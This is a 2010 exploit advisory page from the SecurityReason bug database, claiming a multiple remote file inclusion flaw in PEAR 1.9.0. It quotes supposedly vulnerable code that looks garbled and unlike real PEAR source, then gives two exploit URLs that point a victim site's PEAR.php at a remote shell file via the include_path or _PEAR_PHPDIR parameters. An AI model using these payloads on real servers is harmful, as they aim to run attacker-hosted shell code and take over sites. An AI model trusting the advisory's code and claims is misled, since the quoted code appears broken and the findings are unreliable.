SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow World Laboratory of Bugtraq Database

Arrow  Topic :

PEAR 1.9.0 multiple remote file inclusion


Arrow  WLB : WLB-2010020089  (About)
Arrow  SecurityAlert : None
Arrow  Date : 2010-02-17
Arrow  Credit          : eidelweiss
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote : Yes
Arrow  Local     : No
Arrow  Status   : Bug

Arrow  History : [2010-02-17] Started

Arrow  Affected software :  PEAR version 1.9.0



Arrow  Text :  

###########################################################
###
### PEAR v.1.9.0 Multiple Remote File Inclusion Vulnerability
###
###########################################################
### PEAR, the PHP Extension and Application Repository
###
### * @package PEAR
### * @Version v.1.9.0
### * @license http://opensource.org/licenses/bsd-license.php New BSD
License
### * @link http://pear.php.net/package/PEAR
###
###########################################################
###
### Type : Remote File Inclusion Vulnerability
### Author: eidelweiss
### Date : 2010-02-13
### Location: Indonesia ( http://yogyacarderlink.web.id )
### Contact: g1xsystem [at] windowslive [dot] com
### Greetz : AL-MARHUM - YOGYACARDERLINK TEAM - (D)eal (C)yber
###
###########################################################
###
### Vuln: if ('../DIRECTORY_SEPARATOR/PEAR' != '@'.'include_path'.'@') {
### ini_set('include_path', '../DIRECTORY_SEPARATOR/PEAR');
### $raw = true;
### }
### @ini_set('allow_url_fopen', true);
### if (!ini_get('safe_mode')) {
### @set_time_limit(0);
### }
### $_PEAR_PHPDIR = '#$%^&*';
### define('PEAR_RUNTYPE', 'pecl');
### require_once 'pearcmd.php';
### require_once 'PEAR.php';
### require_once 'PEAR/Frontend.php';
### require_once 'PEAR/Config.php';
### require_once 'PEAR/Command.php';
### require_once 'Console/Getopt.php';
### =========================================================
### exploit: http://victim.com/[DIRECTORY_SEPARATOR]/PEAR_DIR/PEAR.php?incl
ude_path=[Shell.txt?]
### http://victim.com/[DIRECTORY_SEPARATOR]/PEAR_DIR/PEAR.php?_PEAR_PHPDIR
=[Shell.txt?]
###########################################################


Audyt bezpieczeństwa

Security Audit

Analiza powłamaniowa

Arrow  References :  

None

If you want change this note, please use UCP



Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

Copyright © SecurityReason.com. All Rights Reserved.